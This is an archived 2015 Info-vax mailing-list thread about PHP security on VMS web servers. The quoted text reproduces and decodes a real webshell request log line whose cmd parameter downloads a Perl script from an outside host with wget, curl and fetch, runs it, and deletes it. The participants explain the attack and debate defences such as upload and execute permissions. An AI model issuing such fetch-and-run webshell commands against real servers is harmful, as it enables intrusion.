[Info-vax] Using VMS for a web server

Dirk Munk munk at home.nl
Wed Jun 10 01:58:05 EDT 2015 

Jan-Erik Soderholm wrote:
> Bill Gunshannon skrev den 2015-06-09 16:49:
>> In article <ml6qf1$d82$1 at news.albasani.net>,
>>     Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>>>
>>>
>>> It would be nice to have a reproducer and test it out.
>>> Or at least a pointer to a description.
>>>
>> ....
>>>
>>> OK. I have only read quite a lot about PHP and it's "problems"
>>> but never used it or had it installed on any server.
>>>
>>> But it would surprice me *a lot* if there wasn't an available
>>> fix for a simple URL based exploit...
>>
>> OK, I wasn't busy (some of these updates are like watching paint dry!)
>> so here is just one to look at.
>>
>> First, a log entry (sanatized a bit as I don't really need someone else
>> trying this):
>>
>> 103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET
>> /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt*
>> HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
>> rv:1.9.2) Gecko/20100115 Firefox/3.6"
>>
>>
>> Now, let's pull out the applicable part:
>>
>> "GET
>> /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt*
>> HTTP/1.1"
>>
>> Now we analyze it:
>>
>> "GET
>> /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
>>
>> There is a request to get a PHP script.
>>
>> Note immedately after this part is "?cmd="        Hmmmmmm......
>>
>> And what is the command?
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.c
>>
>> o.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;
>>
>> rm%20-rf%20qtalk.txt*
>>
>> And if we break it down:
>>
>> wget%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
>>
>> fetch%20http://identerprise.co.kr/css/b.txt;
>>
>> perl%20qtalk.txt;
>>
>> rm%20-rf%20qtalk.txt*
>>
>>
>> So, the attacker uses a hole in PHP to download a Perl script, using
>> three
>> common ways of doing it (I don't know if any of these are available on
>> VMS
>> but I suspect curl or wget might be).  He then runs it.  And when he
>> is done
>> he cleans up his tracks.
>>
>> What does it do?  No idea.  The point is to show something that PHP
>> allows
>> as a "feature" that makes it probably the worst possible web scripting
>> language.
>>
>> I have seen this method used to download a telnet daemon written in
>> either
>> PHP or Perl.  This allows outsiders who do not have an account on a
>> system
>> to get in for a look around.  Good way to look security shortcomings.
>>
>> bill
>>
>
> OK. That needs a script called wawalo.php already beeing on the server
> in a directory where the server can execute it. The exploit is realy
> to be able to upload the wawalo.php file in the first place.
>
> If you have a server setup where someone can both upload a random
> file and then also execute that file just like that frm the same
> directory, you have a severe problem.
>
> Now, is this a "hole in PHP"? Or could the same thing be done
> using any tool that can take an input parameter and execute it?
>
> I guess any scripting tool could be used to write such a script.
> Many scripting languages are able to take a string and execute it.
>
> Can this be done on an WASD/VMS server? Not if you do not have
> file upload enabled, at least. And you also need execute rights
> on the upload directory.

Is that true? After all, a script file is not an executable. It is 
'just' a file  to be read by the PHP runtime executable, and then PHP is 
doing the actual processing.

So the question is if script languages in a way undermine the VMS 
security setup.

> You can also set it up so thet PHP
> script can only be executed from a safe "script" directory
> with no external write access.
>
> But again, is it realy a "hole in PHP" ?? I'm not sure...
>
>
> Jan-Erik.
>

More information about the Info-vax mailing list